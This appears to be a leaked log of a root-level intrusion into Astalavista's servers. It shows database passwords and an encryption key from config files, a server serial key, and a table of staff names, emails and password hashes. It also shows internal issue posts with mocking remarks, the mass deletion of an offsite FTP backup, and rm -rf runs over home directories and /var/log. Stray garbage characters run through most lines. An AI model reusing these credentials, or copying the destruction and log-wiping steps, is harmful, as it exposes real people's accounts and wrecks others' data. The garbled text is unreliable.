-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
8 E& Q$ ~% |+ {" g9 [, _$ ]* @) k-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
8 \/ Y8 \. W( p; b* e  o/ Jdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
1 R6 u! z5 C6 kdrwx——  2 astanet astanet 4096 Dec 23 12:18 mail
-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
& {) k, [/ |3 a/ N& Y' olrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
6 c# b0 X/ r1 N  X-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
( a2 o; R6 E* L0 }* H) [
% W" r3 W+ N) {5 J0 }) g' `) Ksh-3.2# cd auth/
sh-3.2# ls -la
2 |4 Q; @2 ~5 ]. ?total 28
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
% n+ B# V1 y) O- P% R-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php
; b) \% d3 ], @4 ?-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
- f9 G. |! y8 b' n- P
sh-3.2# cat hackercontest.config.inc.php
- e% w4 o6 a, J7 f# J% X. q( o5 U$ c<?PHP
- U/ m( D: D; L" G+ C; h// Variabeln f?r Verbindung zur Datenbank //
$conxHost = ‘localhost’;                       // MySQL hostname
0 l# C4 n1 I& T9 t$conxUser = ‘hackercontest’;                                       // MySQL user
8 C5 b9 K' m1 s# L) F" J$conxPassword = ‘K6m@7dUc’;                    // MySQL password
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
?>
sh-3.2# cat hosting.config.inc.php
6 ^/ Z9 q  d. k& H, ]9 Y; x<?PHP
// Variabeln f?r Verbindung zur Datenbank //
& G5 s4 S! I2 ]. z$ P" V$conxHost = ‘localhost’;                       // MySQL hostname
$ w* G3 Z! v2 }  Q2 g" G$conxUser = ‘hostinguser’;                                 // MySQL user
1 f" R# j% u1 J4 L0 I$conxPassword = ‘cXvB3981′;                    // MySQL password
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
?>

. y7 [) m0 I2 I! |sh-3.2# cd ..
0 A2 |0 t3 ~/ m) l# Q* s- l$ }sh-3.2# cd com
3 `/ e! B$ k9 x- J/ [. E8 ssh-3.2# ls -la
total 141208
drwx–x–x 10 com  com       4096 Apr 28 12:40 .
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
; m# p$ n3 P1 {9 Y) Q/ Odrwx——  2 com  com       4096 Jun  4 04:04 backups
-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history
8 r' j: F8 ~9 b8 e-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile
-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
: P/ @2 [5 v6 q6 v3 q! `drwx–x–x  3 com  com       4096 Jan 29  2008 domains
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
  p% s. ]9 X: @$ _2 Adrwxrwx—  3 com  mail      4096 Jan  6 19:24 imap
-rw——-  1 com  com         69 Nov 18  2008 .lesshst
drwx——  2 com  com       4096 Sep 24  2007 mail
0 r8 W% R3 |& _% K-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history
, l9 e+ A, I" j+ Q8 X) wdrwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
' ^: ~5 H$ c: V% tlrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
& g+ d- l# U" D8 f/ K4 z-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
2 I: R/ a  P$ P8 h' s4 L* Y: Wdrwx——  2 com  com       4096 Aug 26  2008 .ssh
-rwx——  1 com  com       8515 Feb 10  2008 t
+ U- @& f+ U" o& c; ]2 d) {-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
$ r+ p9 g1 C4 e/ H3 w-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
  `; N' V* |/ m; r! }& M-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
3 P7 L/ x0 K& Y7 l, i* ?8 v
+ j6 D2 D- h' {3 Tsh-3.2# head t.c
% W6 B$ F& j* {, t; ~4 h/*
1 f  z  n4 O% R9 t  c" {* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
; }' t2 ?7 L! k1 R. r6 w* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
$ g8 l& ?* |: e4 U: Y*
5 n" R% Q! J7 B% b; U
$ o9 K  s/ P  c4 ]& h" j. f- H* tsh-3.2# cd /
sh-3.2# ls -la
total 360
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
2 Q! S% x6 @7 [- z9 ^8 C-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
-rw——-   1 root root  10240 Jun  3 02:39 aquota.user
-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db
/ h' V( E& H. ]+ Y-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck
9 K+ z  V8 A/ X  L' b: V1 W-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
8 S) M8 H, {* ~- ldrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
2 H( M/ H1 w/ m0 q) k, Tdrwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
% X" j8 M$ V! i3 E3 Z: Jdrwxr-xr-x  14 root root   4096 Mar 11 17:56 home
-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf
$ W9 w- {# ?, ?. L5 e) ndrwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
drwx——   2 root root  16384 Sep 11  2007 lost+found
drwxr-xr-x   2 root root   4096 Mar 11 17:56 media
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
% U: M; }4 g2 J' Ddrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
3 {2 J2 ]$ r& U  X-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg
drwxr-xr-x   2 root root      0 Jun  3 02:43 net
1 V. y4 h1 S6 f& t% ~* Jdrwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
drwxr-x—  15 root root   4096 Jun  4 08:40 root
6 _. Y2 f' O" d# ~0 v1 m% o/ l' R8 qdrwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
- x% u, j: L+ V7 G2 ?5 Odrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var
1 A  B8 z7 O9 o' U  F$ V
sh-3.2# cd opt
% W6 f* F6 J3 S$ P. Csh-3.2# ls -la
& C) g  z  h/ G# o4 a: ftotal 20
7 M2 U* P$ Z# _3 r6 V" ~( udrwxr-xr-x  3 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws

sh-3.2# cd lsws/
sh-3.2# ls -la
total 108
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
9 G" T  U& p' V8 B- |' z+ J+ Idrwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
drwx——  4 apache apache  4096 Jun  3 02:43 conf
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
: r  @4 D: N) Fdrwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
; u- c# q" m& M& t& w! S-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
8 I! f' a6 i$ B-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP
' `  i$ A+ a2 p4 udrwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
  @" C( u+ b6 B4 u4 Vdrwxr-xr-x  2 root   root    4096 Mar 20  2008 php
drwx——  2 apache apache  4096 Mar 20  2008 phpbuild
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION
2 i5 S% g" S/ ~, _
# e9 P1 b, V+ b4 H: H, \sh-3.2# cd conf
3 L, U+ o) j5 p  {$ r: X: Q  tsh-3.2# ls -la
# p) \* u- O/ _8 F- G8 a9 X8 |+ i) Vtotal 48
- F! ~+ \! g4 sdrwx——  4 apache apache 4096 Jun  3 02:43 .
, C6 G+ b# E" h, K( _drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
drwx——  2 apache apache 4096 Mar 20  2008 cert
0 u1 f$ n" U1 |* k7 b-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml
-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
* l) z# Z2 [7 _* P-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
-rw——-  1 apache apache  256 May 29 15:10 license.key
-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
; F+ t% w/ P; r' O* n8 L7 b" K-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties
-rw——-  1 apache apache   20 May 29 15:10 serial.no
1 c2 C) w+ c1 _  b( O1 p0 q+ }drwx——  2 apache apache 4096 Mar 20  2008 templates
  y4 N  q" ~1 l1 m9 i% i- j# j
sh-3.2# cat serial.no
IbDl-oVsO-CKqL-wVRa
8 i1 v% ^; g& j
sh-3.2# mysql
# O$ J( d  r* c+ n' GWelcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 286844
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
( s! g( p# Z2 I  D# E6 T
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

2 y: s/ G0 G& N* Y& \; }mysql> show databases;
+ g2 {" z4 _; @/ y6 Q) m+———————–+
| Database              |
; _# e" o4 W) q# s% r' B/ P6 u+———————–+
| information_schema    |
| astanet_ads           |
| astanet_mailing_lists |
| astanet_mediawiki     |
| astanet_membersystem  |
| com_contrexx          |
| com_contrexx2         |
2 r3 D9 p3 H2 B' Z$ b5 q| com_contrexx2_live    |
| da_roundcube          |
| dolphin               |
2 U' t1 a$ a. m: z7 M. ^# |: V; [! t| ideapool              |
; |8 Z& Q3 j6 ^: c' d| mysql                 |
| test                  |
' R9 u' g" G$ \| yourmaster            |
+ c. F; N  {' ^. D$ ]. w2 O+———————–+
/ B5 [3 @" S! K8 V& I8 c- T% b& o14 rows in set (0.00 sec)
4 {+ c% Q2 b# [- ?
mysql> use ideapool
" ~& k; L# ]6 z. aDatabase changed
mysql> show tables;
, J, o( [3 L1 @% I$ O( o8 }+———————————–+
0 c; j3 t. }' R| Tables_in_ideapool                |
+———————————–+
/ y( M. K+ l3 w% u4 c0 G8 V| eventum_columns_to_display        |
$ F& C: W$ `* O| eventum_custom_field              |
| eventum_custom_field_option       |
# a; m/ s5 z" L1 o3 v) b| eventum_custom_filter             |
| eventum_customer_account_manager  |
| eventum_customer_note             |
| eventum_email_account             |
" M' L8 x7 ?! [  W| eventum_email_draft               |
| eventum_email_draft_recipient     |
, A9 f' `% F) G6 `( z| eventum_email_response            |
| eventum_faq                       |
$ q) b/ q3 f0 q$ r5 n% S| eventum_faq_support_level         |
| eventum_group                     |
| eventum_history_type              |
: r6 m) I# w, r- @| eventum_irc_notice                |
| eventum_issue                     |
| eventum_issue_association         |
| eventum_issue_attachment          |
| eventum_issue_attachment_file     |
- n* J, a& N, q5 x, r' @5 u' r| eventum_issue_checkin             |
| eventum_issue_custom_field        |
| eventum_issue_history             |
| eventum_issue_quarantine          |
| eventum_issue_requirement         |
1 G& r7 D: i; |7 X| eventum_issue_user                |
| eventum_issue_user_replier        |
| eventum_link_filter               |
% O: i# c6 a( p) _% || eventum_mail_queue                |
' F$ f/ K  x4 W, \7 @& C3 v8 M| eventum_mail_queue_log            |
| eventum_news                      |
/ B! a5 d% ~2 `2 D6 l| eventum_note                      |
# L5 s, B" E! F: z5 q- B* ^| eventum_phone_support             |
| eventum_project                   |
| eventum_project_category          |
) h2 Q; B' B/ }, l# U: l| eventum_project_custom_field      |
| eventum_project_email_response    |
| eventum_project_field_display     |
| eventum_project_group             |
| eventum_project_link_filter       |
| eventum_project_news              |
| eventum_project_phone_category    |
9 Y* [) j" G! f  s  l+ E| eventum_project_priority          |
| eventum_project_release           |
| eventum_project_round_robin       |
7 r( n: D  m9 N3 m% a' _| eventum_project_status            |
: r- O8 v8 E9 O3 p* c# J| eventum_project_status_date       |
| eventum_project_user              |
1 I; d" P9 [8 E" M6 f# G. v  V) b| eventum_reminder_action           |
! }1 ?$ h; a5 B" W| eventum_reminder_action_list      |
; a7 R- K( f, t) b+ i" x# n. X| eventum_reminder_action_type      |
| eventum_reminder_field            |
9 m; Q$ G5 ~) _* q, \- {1 D| eventum_reminder_history          |
% r7 ?8 j4 Z9 i& |$ T4 U& T| eventum_reminder_level            |
| eventum_reminder_level_condition  |
| eventum_reminder_operator         |
| eventum_reminder_priority         |
| eventum_reminder_requirement      |
/ _% w& w& ]/ \9 |: X| eventum_reminder_triggered_action |
| eventum_resolution                |
| eventum_round_robin_user          |
| eventum_search_profile            |
| eventum_status                    |
9 W8 |9 ]& @1 u) G; y3 e| eventum_subscription              |
; [  ^1 K) o4 H9 L" v+ j  N5 x| eventum_subscription_type         |
| eventum_support_email             |
| eventum_support_email_body        |
| eventum_time_tracking             |
5 `) H" @- g# f- D+ E| eventum_time_tracking_category    |
: {9 I; |1 V1 ^| eventum_user                      |
+———————————–+
69 rows in set (0.00 sec)
) C/ D3 t; i; v3 j0 \
( Z7 N% G) Z  m9 zmysql> describe eventum_user;
& Z% [9 _: Z9 r1 p! ?1 \( R: W! ~" A+————————-+——————+——+—–+———————+—————-+
| Field                   | Type             | Null | Key | Default             | Extra          |
$ z3 l/ I" G& l, X* A; A+————————-+——————+——+—–+———————+—————-+
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
; k, M- G0 `( a" _| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
7 g3 L# ^3 ]! ]( _2 K7 j, g| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
# \8 c9 ^' ]1 t9 p+ D| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
| usr_status              | varchar(8)       | NO   |     | active              |                |
9 K$ z4 ?) L, }2 a- g| usr_password            | varchar(32)      | NO   |     |                     |                |
* A3 ]& `* M, @- y9 o0 T| usr_full_name           | varchar(255)     | NO   |     |                     |                |
4 a7 N7 j# h9 p( g5 |' ~| usr_email               | varchar(255)     | NO   | UNI |                     |                |
; V: Y5 \) z9 p" @/ {8 L( v| usr_preferences         | longtext         | YES  |     | NULL                |                |
0 K. l4 A% ^8 D, m& k& {| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
+————————-+——————+——+—–+———————+—————-+
! A9 h% r; g) _5 H* ^13 rows in set (0.00 sec)

mysql> select usr_full_name,usr_email,usr_password from eventum_user;
8 z0 ]* @) t6 Z* _+———————-+——————————-+———————————-+
| usr_full_name        | usr_email                     | usr_password                     |
6 j0 n0 M/ }. `( c; a$ P+———————-+——————————-+———————————-+
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
( M+ ]5 ?. x* U+ h8 q: C| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
7 h9 _: d# r/ y; L7 r9 Z| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
1 i. n+ \! H  Q4 }) I' ^| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
& x1 @9 Y5 B. O8 C| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
4 Q% M/ X0 Z2 f  \9 z| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |
0 m  i" Y! u& U| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |
+———————-+——————————-+———————————-+
15 rows in set (0.00 sec)
! P  ~% I: ?: o) S7 U- p
$ n8 I1 d# ?1 D) s$ c# h$ Gmysql> select iss_description from eventum_issue where iss_id = 43;
7 ?) M4 O3 l3 G- K9 b+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
|
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
2 j2 h( W" v5 C% o2 I' M1 g| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
connected for 90 mins… 120mins… so what i propose is something like:
4 Y1 q* w3 F. O链接标记[url]http://www.surfthechannel.com/[/url]
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
  w% z" p  F( ]: g2 F  a+ h1 _like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
1 w8 x' q4 G4 Obreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
. Y+ M5 X+ _1 p& ]9 [; U0 Bif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
3 H3 i" `8 x2 Q4 S' N4 h- }! K, R, n
We could also put advertisement during play on the flash video player itself… extra $$…
' X* o+ c0 A5 Q) F0 P5 F
" [, A/ h8 o# |  C) XBy sykadul |
# \: c# r- i. k+ X+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
1 row in set (0.00 sec)
2 l2 \5 U/ @8 ~& c( x2 o
. i$ f- |+ P( D1 J. u, B// Money and extra $$ is all they care about. remember that.

mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
7 \& h+ x( {& X: o" m8 d+————————+——————————————————————————————————————————————————————————————————————————————-+
+ b8 C" m9 B0 k/ D8 O( a| iss_summary            | iss_description                                                                                                                                                                                                                          
8 I; g. ]( n* l/ O7 k) x|
+————————+——————————————————————————————————————————————————————————————————————————————-+
| Forum for REAL EXPERTS | Hello,

8 w- {6 g9 X# @4 Q- Z$ SIshtus and I,

Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
- J3 m' w  C" j6 X& o3 |# Z8 CONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..

( e% Z) N8 ^$ N" G" {) q7 y' O/ GOne example a friend of mine from coresecurity.com!
; U9 l4 N  s% s+ x7 @0 z
' \2 d' n" c5 @3 ~+ W( Z. cWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..

|
! e! n1 P5 S1 W* g9 w3 p+————————+——————————————————————————————————————————————————————————————————————————————+
) u# n& ~/ H% x3 q$ S3 q1 row in set (0.00 sec)

! l( s8 k' |! e. y+ j8 [% m  t  Q9 N// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
* [0 Q& T! G7 f, `& ^+ m' a- L
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
8 e- z! }3 P* ^" c# q3 @& ~- T& i+——————+———————————————————————————————+
+ |- y( G1 c4 ~* Y+ H* B; V| iss_summary      | iss_description                                                                             |
+——————+———————————————————————————————+
: l% F/ [- Z: m2 T| Website guidance | Virtual Girl which guides you trought the website.

We need a girl with who you can ( talk )!!!
6 Y3 r  m! z" d  H7 \  x6 V* L5 u# \Also for the News!
So my suggestion is a girl who read you the news loud if you like!
0 Z; ~& q! I6 w( D, w" P& N) Tyou can choose between read yourselfe or she read it for you or both!

" Q8 e2 l2 J  V9 H1 h0 z6 m- ~Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!

Have a look on the example girls!!
* S( Y2 x" z; h4 [8 Q2 ^& A
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]

or that

链接标记[url]http://www.yellostrom.de/[/url]

5 @$ k0 q* x) R  i: `|
3 x" S/ r$ `# G% s" Y( b* _. @+——————+———————————————————————————————+
$ ?$ H& s, E2 r1 row in set (0.00 sec)
2 x5 `( o3 y) P0 ]7 d3 v
// ha ha.
) o+ [# ]0 `" X6 E+ m
2 m3 b; a; |/ H5 E: L) O) Pmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
+————————–+———————————————————————————————————–+
. H, H" E: h$ m2 o| iss_summary              | iss_description                                                                                           |
+————————–+———————————————————————————————————–+
; f5 Z1 O  W/ z0 T; U| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
+————————–+———————————————————————————————————–+
7 d5 `, `/ R: a' y7 e2 Y1 row in set (0.00 sec)

: ?+ c: ?( J. S! {9 F( l6 s// LOL.

( u. {  F% u9 n* Z) ?4 I/ @, [mysql> exit
Bye

" C1 M& S- y' ssh-3.2# ftp 212.254.194.163
$ c3 V; q' }9 H- Z6 e2 `. A7 i7 Y0 uConnected to 212.254.194.163.
% I: o. s, `$ j# L7 {& d' ]7 Y220 BackupCOM_VW FTP server ready.
1 A0 t+ V) x$ p( T  l8 ]5 A" h/ u504 AUTH: security mechanism ‘GSSAPI’ not supported.
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
KERBEROS_V4 rejected as an authentication type
( O" J8 U9 e, {3 qName (212.254.194.163:root): astalavista.com
331 Password required for astalavista.com.
Password:
7 @0 G% N$ I9 q$ h, C. x230 User astalavista.com logged in.
4 p( D% v: n. `6 X: `7 n2 tRemote system type is UNIX.
9 k3 O, L7 @2 E, G0 e' R7 |$ S# u& IUsing binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,188)
+ l  ^0 H7 l, S' t$ P150 Opening BINARY mode data connection for ‘file list’.
" Y3 V" {; f9 `) Xdr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
8 v" q& w5 P" G! Q/ p: |226 Transfer complete.
ftp> cd astalavista.com
250 CWD command successful.
1 {% k. b$ w5 i8 ~% x3 f& \ftp> ls -la
2 u$ ]# O* m& z227 Entering Passive Mode (212,254,194,163,2,189)
' ]) E. o2 U, u8 d5 i- B& ]& x150 Opening BINARY mode data connection for ‘file list’.
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar
- ^3 @. E" @- Q9 w7 F* r  P[snip]
7 n& `' i; s$ s0 a) l226 Transfer complete.
4 ?0 G- q( w1 Y% P7 a/ a3 B* ?ftp> mdelete *
/ D: M+ W# t2 W) x. \3 Dftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,193)
/ t4 }- C$ v- {* b# l150 Opening BINARY mode data connection for ‘file list’.
2 M; Y; c. }4 f8 I3 h# @226 Transfer complete.
8 U3 j( z& Y* n* P, {% s$ {3 Rftp>

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
  a/ j' |- S! D+ S" Cdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
) A/ q- @: v- y% `3 ?1 u% C-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
drwx–x–x 10 com     com      4096 Apr 28 12:40 com
" W# W7 k: |3 A. ^# `8 G* Sdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
2 A- g; K$ C* n; X8 p5 t3 ^, udrwx——  3 jon     jon      4096 Sep 21  2007 jon
; _" m; r1 g% I1 p% T2 U1 gdrwx——  2 root    root    16384 Sep 11  2007 lost+found
7 |! R6 i3 c- g  ndrwxr-xr-x  2 root    root     4096 Sep 14  2007 my
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
; m1 a- ?# N& o& ydrwx——  2 jon     jon      4096 Sep 15  2007 test
/ d# m. g7 d4 H2 T) D; t3 J- tdrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp

( D! ?; X* N0 [( |; ?sh-3.2# rm -rf backup/
8 w: l/ z* b4 k0 c  ~! G/ N+ Rsh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
; m; b, r% C( Z  t! hsh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
6 Z3 c/ L! h5 `sh-3.2# rm -rf test/
sh-3.2# rm -rf tmp/
8 [! }# r' Y; ksh-3.2# cd ~
sh-3.2# rm -rf *
: H" A$ X2 c0 Q2 Rsh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
' o& r6 e0 Y' m% ksh-3.2# rm -rf /home/*
sh-3.2# mysql
% c% u/ y. d8 v7 S7 Q/ }2 E- \5 bWelcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 407156
8 ]! R( P  t2 _  D" d; iServer version: 5.0.45-community-log MySQL Community Edition (GPL)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
! |8 ~6 ^% X! R7 V- J0 ^: Q$ e
mysql> show databases;
( L; ~1 c+ A7 u1 T; y5 W+———————–+
| Database              |
+———————–+
| information_schema    |
0 t7 h8 K8 u$ h+ I| astanet_ads           |
! s. }' G$ F' H  X! u* g* k; J: H: W| astanet_mailing_lists |
: Y3 }+ J1 m: z! b| astanet_mediawiki     |
: I9 u" c4 ^! W4 ^| astanet_membersystem  |
0 y4 s$ z; J$ x1 h| com_contrexx          |
| com_contrexx2         |
, L4 _2 [6 X3 @& L( M| com_contrexx2_live    |
" e0 \. e# T5 m% ~* h7 W2 o8 O# ^| da_roundcube          |
| dolphin               |
# w+ q/ d+ f: ~5 N$ {7 q( h| ideapool              |
& W4 s3 S) u2 U| mysql                 |
4 R8 L" R/ J6 x6 G| test                  |
* N/ _6 l' B" B' C: w, V9 R| yourmaster            |
7 N7 v! U" [( Y+ r9 H+———————–+
